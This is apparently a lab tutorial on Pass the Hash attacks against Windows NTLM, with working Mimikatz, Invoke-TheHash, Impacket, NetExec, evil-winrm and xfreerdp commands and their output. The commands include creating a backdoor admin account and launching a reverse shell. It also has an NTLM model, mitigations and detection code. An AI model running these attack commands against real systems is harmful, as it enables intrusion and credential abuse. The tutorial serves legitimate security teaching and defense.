
Pass the Hash (PtH) Attacks

A Pass the Hash (PtH) attack is a technique in which an attacker authenticates with a user’s password hash instead of the plaintext password. The attacker never needs to crack the hash to recover the password. PtH works because the authentication protocol accepts the hash itself as proof: the NTLM password hash is not salted and stays the same for every session until the password is changed.

Prerequisites

To obtain a password hash, the attacker must already hold administrative (or other sufficiently elevated) privileges on a compromised host. Hashes can be obtained in several ways, including:

  • Dumping the local SAM database from a compromised host
  • Extracting hashes from the NTDS database (ntds.dit) on a Domain Controller
  • Pulling the hashes from memory (lsass.exe)

Windows NTLM Background

Microsoft’s Windows New Technology LAN Manager (NTLM) is a suite of security protocols that authenticates users’ identities and protects the integrity and confidentiality of their data. NTLM is a single sign-on (SSO) solution that uses a challenge-response protocol to verify the user’s identity without the password itself ever being sent over the network.

Despite its known weaknesses, NTLM remains in common use for compatibility with legacy clients and servers, even on modern systems. Microsoft continues to support it, but Kerberos has been the default authentication mechanism since Windows 2000 and in all subsequent Active Directory (AD) domains.

With NTLM, the password hashes stored on servers and domain controllers are not salted, so an adversary holding a password hash can authenticate a session without knowing the original password. This is what makes Pass the Hash attacks possible.
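To make concrete why NTLM proves possession of the hash rather than of the password, here is a small Python model. It is an added example, not code from this post or from any of the tools it describes: a pure-Python MD4 (OpenSSL 3 builds of hashlib often omit MD4) computes the NT hash, and the NTLMv2 proof is then derived from that hash alone, as MS-NLMP specifies. The user name, domain, server challenge and client blob are constructed values.

```python
"""Model of why an NT hash is a password-equivalent (added example, not from the post).

Two facts the post relies on:
  1. The NT hash is an unsalted MD4 of the UTF-16LE password: identical on every
     host and for every user with that password, unchanged until the password is.
  2. The NTLMv2 proof is derived from the NT hash only, so the verifier stores the
     hash and a client holding the hash (never the password) produces a valid proof.
"""
import hashlib
import hmac
import struct

MASK32 = 0xFFFFFFFF


def _lrot(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK32


def _md4_round(fn, regs, X, order, shifts, const):
    # Each step updates one register (a, d, c, b in turn) from the other three.
    for i, k in enumerate(order):
        t = (-i) % 4
        x, y, z = regs[(t + 1) % 4], regs[(t + 2) % 4], regs[(t + 3) % 4]
        regs[t] = _lrot((regs[t] + fn(x, y, z) + X[k] + const) & MASK32, shifts[i % 4])


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4, pure Python so it runs where hashlib has no 'md4'."""
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg)) % 64)          # pad to 56 mod 64
    msg += struct.pack("<Q", len(data) * 8)            # little-endian bit length
    for off in range(0, len(msg), 64):
        X = list(struct.unpack("<16I", msg[off:off + 64]))
        regs = state[:]
        _md4_round(F, regs, X, range(16), (3, 7, 11, 19), 0)
        _md4_round(G, regs, X, [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15],
                   (3, 5, 9, 13), 0x5A827999)
        _md4_round(H, regs, X, [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15],
                   (3, 9, 11, 15), 0x6ED9EBA1)
        state = [(s + r) & MASK32 for s, r in zip(state, regs)]
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> bytes:
    """NTOWFv1: MD4 over the UTF-16LE password. No salt, no per-user or per-host input."""
    return md4(password.encode("utf-16le"))


def ntlmv2_proof(nt: bytes, user: str, domain: str, server_challenge: bytes, blob: bytes) -> bytes:
    """NTProofStr as in MS-NLMP 3.3.2. Every input is the NT hash or public protocol data."""
    response_key = hmac.new(nt, (user.upper() + domain).encode("utf-16le"), hashlib.md5).digest()
    return hmac.new(response_key, server_challenge + blob, hashlib.md5).digest()


def demo() -> dict:
    """Client with the password vs. client with only the stored hash: same proof."""
    password = "Password123"                             # constructed sample value
    challenge = bytes.fromhex("0123456789abcdef")        # constructed 8-byte server challenge
    blob = b"\x01\x01" + b"\x00" * 14 + b"\x11" * 8 + b"\x00" * 4  # constructed client blob
    stored = nt_hash(password)                           # what SAM / NTDS.dit keeps
    from_password = ntlmv2_proof(nt_hash(password), "julio", "INLANEFREIGHT", challenge, blob)
    from_hash_only = ntlmv2_proof(stored, "julio", "INLANEFREIGHT", challenge, blob)
    return {
        "nt_hash_hex": stored.hex(),
        "verifier_accepts_hash_holder": from_hash_only == from_password,
    }


if __name__ == "__main__":
    print(demo())
```

The same ntlmv2_proof function serves as the client’s response and as the verifier’s check, which is the whole problem: the domain controller stores the NT hash, so anyone holding that hash, on any host, produces exactly the response the verifier expects. Nothing in the exchange is tied to the plaintext, and nothing changes between sessions until the password does.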


Pass the Hash from Windows

Using Mimikatz

Mimikatz has a module named sekurlsa::pth that allows us to perform a Pass the Hash attack by starting a process using the hash of the user’s password.

Required Parameters:

  • /user - The user name we want to impersonate
  • /rc4 or /NTLM - NTLM hash of the user’s password
  • /domain - Domain the user belongs to. For local accounts, use the computer name, localhost, or a dot (.)
  • /run - The program to run with the user’s context (defaults to cmd.exe)

c:\tools> mimikatz.exe privilege::debug "sekurlsa::pth /user:julio /rc4:64F12CDDAA88057E06A81B54E73B949B /domain:inlanefreight.htb /run:cmd.exe" exit

user    : julio
domain  : inlanefreight.htb
program : cmd.exe
impers. : no
NTLM    : 64F12CDDAA88057E06A81B54E73B949B
  |  PID  8404
  |  TID  4268
  |  LSA Process was already R/W
  |  LUID 0 ; 5218172 (00000000:004f9f7c)
  \_ msv1_0   - data copy @ 0000028FC91AB510 : OK !
  \_ kerberos - data copy @ 0000028FC964F288
   \_ des_cbc_md4       -> null
   \_ des_cbc_md4       OK
   \_ des_cbc_md4       OK
   \_ des_cbc_md4       OK
   \_ des_cbc_md4       OK
   \_ des_cbc_md4       OK
   \_ des_cbc_md4       OK
   \_ *Password replace @ 0000028FC9673AE8 (32) -> null

Now you can use the spawned cmd.exe to execute commands in the user’s context.

Using Invoke-TheHash (PowerShell)

Invoke-TheHash is a collection of PowerShell functions for performing Pass the Hash attacks with WMI and SMB. WMI and SMB connections are accessed through the .NET TCPClient. Authentication is performed by passing an NTLM hash into the NTLMv2 authentication protocol.

Note: Local administrator privileges are not required client-side, but the user and hash we use to authenticate need to have administrative rights on the target computer.

Required Parameters:

  • Target - Hostname or IP address of the target
  • Username - Username to use for authentication
  • Domain - Domain to use for authentication (unnecessary with local accounts or when using @domain after the username)
  • Hash - NTLM password hash for authentication (accepts LM:NTLM or NTLM format)
  • Command - Command to execute on the target

SMB Execution Example

Create a new user and add it to the local Administrators group:

PS c:\tools\Invoke-TheHash> Import-Module .\Invoke-TheHash.psd1
PS c:\tools\Invoke-TheHash> Invoke-SMBExec -Target 172.16.1.10 -Domain inlanefreight.htb -Username julio -Hash 64F12CDDAA88057E06A81B54E73B949B -Command "net user mark Password123 /add && net localgroup administrators mark /add" -Verbose

VERBOSE: [+] inlanefreight.htb\julio successfully authenticated on 172.16.1.10
VERBOSE: inlanefreight.htb\julio has Service Control Manager write privilege on 172.16.1.10
VERBOSE: Service EGDKNNLQVOLFHRQTQMAU created on 172.16.1.10
VERBOSE: [*] Trying to execute command on 172.16.1.10
[+] Command executed with service EGDKNNLQVOLFHRQTQMAU on 172.16.1.10
VERBOSE: Service EGDKNNLQVOLFHRQTQMAU deleted on 172.16.1.10

WMI Execution Example (Reverse Shell)

First, start a netcat listener:

PS C:\tools> .\nc.exe -lvnp 8001
listening on [any] 8001 ...

Generate a PowerShell reverse shell payload (e.g., using https://revshells.com with PowerShell #3 Base64 option), then execute:

PS c:\tools\Invoke-TheHash> Import-Module .\Invoke-TheHash.psd1
PS c:\tools\Invoke-TheHash> Invoke-WMIExec -Target DC01 -Domain inlanefreight.htb -Username julio -Hash 64F12CDDAA88057E06A81B54E73B949B -Command "powershell -e <BASE64_ENCODED_PAYLOAD>"

Pass the Hash from Linux

Using Impacket

Impacket has several tools that support authentication via Pass the Hash, including:

  • impacket-psexec
  • impacket-wmiexec
  • impacket-atexec
  • impacket-smbexec

PsExec Example

$ impacket-psexec administrator@10.129.201.126 -hashes :30B3783CE2ABF1AF70F77D0660CF3453

Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] Requesting shares on 10.129.201.126.....
[*] Found writable share ADMIN$
[*] Uploading file SLUBMRXK.exe
[*] Opening SVCManager on 10.129.201.126.....
[*] Creating service BnEU on 10.129.201.126.....
[*] Starting service BnEU.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.19041.1415]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32>

Using NetExec

NetExec (formerly CrackMapExec) can execute commands using Pass the Hash.

$ netexec smb 10.129.201.126 -u Administrator -d . -H 30B3783CE2ABF1AF70F77D0660CF3453 -x whoami

SMB         10.129.201.126  445    MS01            [*] Windows 10 Enterprise 10240 x64 (name:MS01) (domain:.) (signing:False) (SMBv1:True)
SMB         10.129.201.126  445    MS01            [+] .\Administrator 30B3783CE2ABF1AF70F77D0660CF3453 (Pwn3d!)
SMB         10.129.201.126  445    MS01            [+] Executed command 
SMB         10.129.201.126  445    MS01            MS01\administrator

Using evil-winrm

Evil-WinRM can authenticate with Pass the Hash over PowerShell remoting (WinRM). It is useful when SMB is blocked or the account lacks local administrative rights.

$ evil-winrm -i 10.129.201.126 -u Administrator -H 30B3783CE2ABF1AF70F77D0660CF3453

Evil-WinRM shell v3.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents>

Note: When using a domain account, include the domain name: administrator@inlanefreight.htb

Using RDP with xfreerdp

Pass the Hash over RDP can provide GUI access to the target system.

Caveats:

  • Restricted Admin Mode must be enabled on the target (disabled by default)

Enable Restricted Admin Mode

On the target, set the DisableRestrictedAdmin value under the Lsa registry key to 0:

c:\tools> reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f

Connect via RDP

$ xfreerdp /v:10.129.201.126 /u:julio /pth:64F12CDDAA88057E06A81B54E73B949B

UAC Limitations for Local Accounts

UAC (User Account Control) limits local users’ ability to perform remote administration operations.

LocalAccountTokenFilterPolicy

When HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy is set to:

  • 0 - Only the built-in local admin account (RID-500, “Administrator”) can perform remote administration tasks
  • 1 - Other local admins are also allowed

FilterAdministratorToken

If the FilterAdministratorToken registry value (disabled by default) is enabled (set to 1), the RID-500 account is also subject to UAC token filtering, so remote PtH with that account fails against the machine.

Important: These settings only apply to local administrative accounts. Domain accounts with administrative rights on a computer can still use Pass the Hash.


Mitigations

  • Limit the use of local administrator accounts
  • Use a unique local administrator password on every machine, so one dumped hash does not work across the fleet
  • Add sensitive accounts to the Protected Users group
  • Implement Credential Guard
  • Monitor for PtH indicators (e.g., NTLM authentication events, unusual logon patterns)
  • Regularly rotate privileged account passwords
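The UAC section above and the monitoring bullet both reduce to checks a defender can automate. The following Python is an added example, not code from this post: it runs simple PtH detection logic over a handful of constructed records shaped like the fields of Windows Security event 4624 (successful logon), and audits the three registry values discussed above. Host names, IP addresses, account names, the AD domain name and the fan-out threshold are all constructed or assumed.

```python
"""PtH detection and hardening checks over constructed data (added example, not from the post).

Records mimic Windows Security event 4624 fields; policy dicts mimic the registry
values LocalAccountTokenFilterPolicy, FilterAdministratorToken and DisableRestrictedAdmin.
"""
from collections import defaultdict

AD_DOMAIN = "INLANEFREIGHT"      # assumed AD NetBIOS domain of the sample environment
BUILTIN_ADMIN = "administrator"  # assumed name of the RID-500 account on the sample hosts

# Constructed 4624-style records: a benign Kerberos logon, a RID-500 local NTLM
# network logon, an NTLMv1 logon, and one domain account reaching four hosts over NTLM.
EVENTS = [
    {"host": "WS01", "TargetUserName": "julio", "TargetDomainName": "INLANEFREIGHT",
     "LogonType": 3, "AuthenticationPackageName": "Kerberos", "LmPackageName": "-",
     "IpAddress": "10.129.1.50"},
    {"host": "MS01", "TargetUserName": "Administrator", "TargetDomainName": "MS01",
     "LogonType": 3, "AuthenticationPackageName": "NTLM", "LmPackageName": "NTLM V2",
     "IpAddress": "10.129.201.99"},
    {"host": "MS01", "TargetUserName": "svc_backup", "TargetDomainName": "INLANEFREIGHT",
     "LogonType": 3, "AuthenticationPackageName": "NTLM", "LmPackageName": "NTLM V1",
     "IpAddress": "10.129.1.20"},
] + [
    {"host": h, "TargetUserName": "julio", "TargetDomainName": "INLANEFREIGHT",
     "LogonType": 3, "AuthenticationPackageName": "NTLM", "LmPackageName": "NTLM V2",
     "IpAddress": "10.129.201.99"}
    for h in ("DC01", "MS01", "MS02", "MS03")
]


def is_ntlm_network_logon(event):
    """Logon type 3 (network) with the NTLM package: the footprint every PtH tool above leaves."""
    return event["LogonType"] == 3 and event["AuthenticationPackageName"].upper() == "NTLM"


def flag_events(events, fanout_threshold=3):
    """Return a list of (kind, where, who) alerts for PtH-shaped NTLM activity."""
    alerts = []
    hosts_by_source = defaultdict(set)  # (account, source IP) -> hosts reached over NTLM
    for e in events:
        if not is_ntlm_network_logon(e):
            continue
        user, dom = e["TargetUserName"], e["TargetDomainName"]
        account = f"{dom}\\{user}"
        hosts_by_source[(account, e["IpAddress"])].add(e["host"])
        if e["LmPackageName"].upper() == "NTLM V1":
            alerts.append(("ntlmv1", e["host"], account))
        # A local account (domain field is the host name or ".") logging on over the
        # network is the classic PtH pattern; the RID-500 account is the worst case
        # because UAC token filtering exempts it by default.
        if dom.upper() != AD_DOMAIN:
            kind = "local-rid500" if user.lower() == BUILTIN_ADMIN else "local-account"
            alerts.append((kind, e["host"], account))
    # One account + source reaching many hosts over NTLM in a window is lateral movement.
    for (account, ip), hosts in hosts_by_source.items():
        if len(hosts) >= fanout_threshold:
            alerts.append(("ntlm-fanout", f"{len(hosts)} hosts", f"{account} from {ip}"))
    return alerts


def audit_host_policy(policy):
    """Findings for a host's registry values; a missing value means the Windows default."""
    findings = []
    if policy.get("LocalAccountTokenFilterPolicy", 0) == 1:
        findings.append("LocalAccountTokenFilterPolicy=1: all local admins usable for remote admin (and PtH)")
    if policy.get("FilterAdministratorToken", 0) == 0:
        findings.append("FilterAdministratorToken=0: RID-500 account exempt from UAC remote filtering")
    if policy.get("DisableRestrictedAdmin") == 0:
        findings.append("DisableRestrictedAdmin=0: Restricted Admin RDP enabled, RDP PtH possible")
    return findings


if __name__ == "__main__":
    for alert in flag_events(EVENTS):
        print(alert)
    print(audit_host_policy({"LocalAccountTokenFilterPolicy": 1, "DisableRestrictedAdmin": 0}))
```

On a real host the same fields come from Get-WinEvent on the Security log (4624 carries TargetUserName, TargetDomainName, LogonType, AuthenticationPackageName, LmPackageName and IpAddress), and the policy dict from the two registry paths named above. The fan-out rule is the one that catches the impacket/NetExec style sweeps in the sections above, because each successful PtH logon still lands as a type 3 NTLM 4624 on the target.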
